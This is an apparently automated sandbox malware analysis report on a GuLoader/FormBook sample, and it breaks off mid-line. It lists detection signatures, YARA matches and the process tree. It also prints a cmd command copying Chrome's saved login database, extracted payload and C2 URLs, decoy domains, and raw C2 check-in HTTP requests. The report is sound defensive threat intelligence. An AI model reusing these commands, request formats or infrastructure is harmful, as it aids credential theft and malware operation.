Play interactive tourEdit tour

# Windows Analysis Report REQUIREMENT.exe

## Overview

### General Information

 Sample Name: REQUIREMENT.exe Analysis ID: 1641 MD5: fb70ff484021669624233d0fbd77ec6a SHA1: 6820b13631967663ec2637c43c828468633051fd SHA256: 2b40757a6763aa725d86426ce3cd16fcf1380a9152837d4fbe5e5b085710054c Infos: Most interesting Screenshot:

### Detection

 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

### Classification

 System is w10x64nativeREQUIREMENT.exe (PID: 1776 cmdline: 'C:\Users\user\Desktop\REQUIREMENT.exe' MD5: FB70FF484021669624233D0FBD77EC6A)REQUIREMENT.exe (PID: 1172 cmdline: 'C:\Users\user\Desktop\REQUIREMENT.exe' MD5: FB70FF484021669624233D0FBD77EC6A)explorer.exe (PID: 680 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)autoconv.exe (PID: 5024 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 469594005E3B94C5945BCCE7FC521C05)autochk.exe (PID: 5612 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 95127C028063423E1253BD0C8CD6C9CB)systray.exe (PID: 2092 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 28D565BB24D30E5E3DE8AFF6900AF098)cmd.exe (PID: 2492 cmdline: /c del 'C:\Users\user\Desktop\REQUIREMENT.exe' MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)cmd.exe (PID: 7420 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)firefox.exe (PID: 3076 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)certmgr3ff.exe (PID: 1444 cmdline: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe MD5: FB70FF484021669624233D0FBD77EC6A)certmgr3ff.exe (PID: 2676 cmdline: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe MD5: FB70FF484021669624233D0FBD77EC6A)certmgr3ff.exe (PID: 7460 cmdline: 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe' MD5: FB70FF484021669624233D0FBD77EC6A)certmgr3ff.exe (PID: 6616 cmdline: 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe' MD5: FB70FF484021669624233D0FBD77EC6A)certmgr3ff.exe (PID: 7840 cmdline: 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe' MD5: FB70FF484021669624233D0FBD77EC6A)certmgr3ff.exe (PID: 4776 cmdline: 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe' MD5: FB70FF484021669624233D0FBD77EC6A)cleanup
``{"Payload URL": "https://drive.google.com/uc?export=downloa"}``
``{"C2 list": ["www.tpmionline.com/cogu/"], "decoy": ["bornhub.xyz", "hancofe.store", "bestofnapa.guide", "innerhell.space", "ryker.ink", "leschoixusa.com", "bqgfk.com", "yakyu-eiga.com", "martialkitchen.com", "thousandoaks-buickgmc.com", "researchlearningspirit.xyz", "byobuzz.com", "taichan.xyz", "ballznutcracker.com", "soymilk-design.com", "chalengestodo.com", "nu12.online", "hkautobox.com", "uprisehealthmonitoring.com", "027jia.net", "cacaolixir.com", "werasdfdfsadf.info", "sanchalanprokashon.com", "donlead.com", "dsnfryfufi.com", "laythproduction.com", "narcozland.com", "jachaljuega.com", "centralcontable.net", "agamottocoin.com", "congtyvhomes.com", "i8news-de.website", "estudio-me.com", "high-clicks.com", "boliden-ab.com", "nazfoodstuff.com", "sozialwirtschaft.team", "xn--4pvw92bcry.com", "6ohmf.info", "fishermandm.com", "marvellouslles.com", "suprabranding.net", "jkwhitleyphotography.com", "qylaser.net", "034455.com", "farbeo.com", "boggbeg.com", "domainair.biz", "gulfweeks.com", "alexanderorlandis.com", "earning-beauty.xyz", "shopsharpgraphics.com", "fdndigtavrcb.net", "ceruleden.com", "originial-motors.com", "ebbtidefloodtide.com", "ctlcloudfr.com", "bywl.top", "alo360.net", "cinargeridonusum.com", "xn--ahindelivery-3mc.com", "cryptoidolz.pro", "snowmanvila.com", "mobileiranian2.com"]}``
SourceRuleDescriptionAuthorStrings
00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x16aa9:\$sqlite3step: 68 34 1C 7B E1
• 0x16bbc:\$sqlite3step: 68 34 1C 7B E1
• 0x16ad8:\$sqlite3text: 68 38 2A 90 C5
• 0x16bfd:\$sqlite3text: 68 38 2A 90 C5
• 0x16aeb:\$sqlite3blob: 68 53 D8 7F 8C
• 0x16c13:\$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8608:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8992:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x146a5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14191:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x147a7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1491f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x93aa:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1340c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa122:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19b77:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1ac1a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000000.35242814301.0000000027517000.00000004.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
• 0x11d14:\$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Click to see the 33 entries

## Sigma Overview

No Sigma rule has matched

## Jbx Signature Overview

### AV Detection:

 Found malware configuration Show sources
 Source: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloa"} Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.tpmionline.com/cogu/"], "decoy": ["bornhub.xyz", "hancofe.store", "bestofnapa.guide", "innerhell.space", "ryker.ink", "leschoixusa.com", "bqgfk.com", "yakyu-eiga.com", "martialkitchen.com", "thousandoaks-buickgmc.com", "researchlearningspirit.xyz", "byobuzz.com", "taichan.xyz", "ballznutcracker.com", "soymilk-design.com", "chalengestodo.com", "nu12.online", "hkautobox.com", "uprisehealthmonitoring.com", "027jia.net", "cacaolixir.com", "werasdfdfsadf.info", "sanchalanprokashon.com", "donlead.com", "dsnfryfufi.com", "laythproduction.com", "narcozland.com", "jachaljuega.com", "centralcontable.net", "agamottocoin.com", "congtyvhomes.com", "i8news-de.website", "estudio-me.com", "high-clicks.com", "boliden-ab.com", "nazfoodstuff.com", "sozialwirtschaft.team", "xn--4pvw92bcry.com", "6ohmf.info", "fishermandm.com", "marvellouslles.com", "suprabranding.net", "jkwhitleyphotography.com", "qylaser.net", "034455.com", "farbeo.com", "boggbeg.com", "domainair.biz", "gulfweeks.com", "alexanderorlandis.com", "earning-beauty.xyz", "shopsharpgraphics.com", "fdndigtavrcb.net", "ceruleden.com", "originial-motors.com", "ebbtidefloodtide.com", "ctlcloudfr.com", "bywl.top", "alo360.net", "cinargeridonusum.com", "xn--ahindelivery-3mc.com", "cryptoidolz.pro", "snowmanvila.com", "mobileiranian2.com"]}
 Multi AV Scanner detection for submitted file Show sources
 Source: REQUIREMENT.exe ReversingLabs: Detection: 48%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Aidr0p8lx\certmgr3ff.exe ReversingLabs: Detection: 48%
 Uses 32bit PE files Show sources
 Source: REQUIREMENT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
 Uses secure TLS version for HTTPS connections Show sources
 Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49790 version: TLS 1.2 Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49791 version: TLS 1.2 Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49824 version: TLS 1.2 Source: unknown HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49825 version: TLS 1.2 Source: unknown HTTPS traffic detected: 172.217.168.78:443 -> 192.168.11.20:49826 version: TLS 1.2 Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49829 version: TLS 1.2 Source: unknown HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49830 version: TLS 1.2 Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49831 version: TLS 1.2 Source: unknown HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49832 version: TLS 1.2
 Binary contains paths to debug symbols Show sources
 Source: Binary string: systray.pdb source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp Source: Binary string: systray.pdbGCTL source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp Source: Binary string: wntdll.pdbUGP source: REQUIREMENT.exe, 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp, systray.exe, 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35658181746.000000001E950000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35788695940.000000001EA8D000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35829603529.000000001EA7D000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: certmgr3ff.exe
 Contains functionality to enumerate / list files inside a directory Show sources
 Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_027DFA80 FindFirstFileW,FindNextFileW,FindClose, 13_2_027DFA80 Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_027DFA79 FindFirstFileW,FindNextFileW,FindClose, 13_2_027DFA79
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 13_2_027E62B9 Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 13_2_027E5674 Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop ebx 13_2_027D6AB8

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 51.77.52.109:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 51.77.52.109:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 51.77.52.109:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49795 -> 172.67.139.41:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49795 -> 172.67.139.41:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49795 -> 172.67.139.41:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 216.189.108.75:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 216.189.108.75:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 216.189.108.75:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49807 -> 15.197.150.5:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49807 -> 15.197.150.5:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49807 -> 15.197.150.5:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49808 -> 198.54.117.211:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49808 -> 198.54.117.211:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49808 -> 198.54.117.211:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 142.250.186.179:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 142.250.186.179:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 142.250.186.179:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 216.189.108.75:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 216.189.108.75:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 216.189.108.75:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.139.41:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.139.41:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.139.41:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 216.189.108.75:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 216.189.108.75:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 216.189.108.75:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 137.117.17.70:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 137.117.17.70:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 137.117.17.70:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 192.0.78.25:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 192.0.78.25:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 192.0.78.25:80
 System process connects to network (likely due to code injection or exploit) Show sources
 Performs DNS queries to domains with low reputation Show sources
 Source: DNS query: www.taichan.xyz Source: DNS query: www.researchlearningspirit.xyz
 C2 URLs / IPs found in malware configuration Show sources
 Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=downloa Source: Malware configuration extractor URLs: www.tpmionline.com/cogu/
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
 JA3 SSL client fingerprint seen in connection with other malware Show sources
 Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /cogu/?E6=XfIccXNfLX5VXF4pbqJOgkj9hfbfozamY6uAUfQ6uaB911jdIVb8IPx0hpo8MPsnFfll&EVpdF=D6AlWhC HTTP/1.1Host: www.hkautobox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=A+BqLwYGva59ha/kPE6YS9y5Cw6+WAl2lefwiAx9zEuoRfqY6i5KVFoFLUK0YMYmgzYy&EVpdF=D6AlWhC HTTP/1.1Host: www.taichan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&EVpdF=D6AlWhC HTTP/1.1Host: www.researchlearningspirit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=0YOc4eMaPzOzEkITDzffiHUHUfLmwWJQOjcrghoXxwbMleRPqH/xhR7l6RpoJjhKUSQ4&EVpdF=D6AlWhC HTTP/1.1Host: www.bestofnapa.guideConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=Esy+SZGnlGcFL3b4TdwIqkWYMoe5TN9PO2uJWgi8huQtR8iqs12O2F0FkbqpOK+vLGht&EVpdF=D6AlWhC HTTP/1.1Host: www.bqgfk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC HTTP/1.1Host: www.centralcontable.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=RrpHjQu0LYHaKA/4jQL7YSE8Zlpf0+V6RMywmZjWIXP7087B5zoOXLZv/c2UnXWK/cWX&EVpdF=D6AlWhC HTTP/1.1Host: www.mobileiranian2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=AKrVC46g6aUqOUl59QNJifV5z+OjBVKueGdcTrEcNhmNt+uKBfQ1nRhJazzsjvYBoCEF&EVpdF=D6AlWhC HTTP/1.1Host: www.soymilk-design.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=0JW80yNTUiIblQnhj6MVn32XupSCHJgGKr7CbJ8acIuUK/cVpV73gH6OM/JKXthPyqu2 HTTP/1.1Host: www.jkwhitleyphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=S26i6wvHPThQg5EmN96E/uV1flc9kx0qaETcxJTPPIRiBsvCj8OwSBVU0bghLZ2zBTNI&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.boliden-ab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=nujE8SKobpMEhFJCVnGir4WeRJmwvtVIfZaGtibw0wWMPhuUS2YahDL2LgFihEH5PyEZ HTTP/1.1Host: www.jachaljuega.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.xn--4pvw92bcry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=xvNBpPJxoT3V4STjWu+oXBc4W2+zox4LkJxyAqr5flGYxwgg6ZSnpz45f2Sl431JRkcr HTTP/1.1Host: www.ceruleden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.centralcontable.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=jcFOH/ZxkSx2B+eOzji128R7cFyPyE6Tynf2GelbWKAhzBX6sEIR/9TLWk4pwFmf1t+F HTTP/1.1Host: www.marvellouslles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1Host: www.high-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1Host: www.alo360.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1Host: www.alo360.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF HTTP/1.1Host: www.nu12.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&GJE=6lTPJF HTTP/1.1Host: www.researchlearningspirit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&GJE=6lTPJF HTTP/1.1Host: www.xn--4pvw92bcry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET 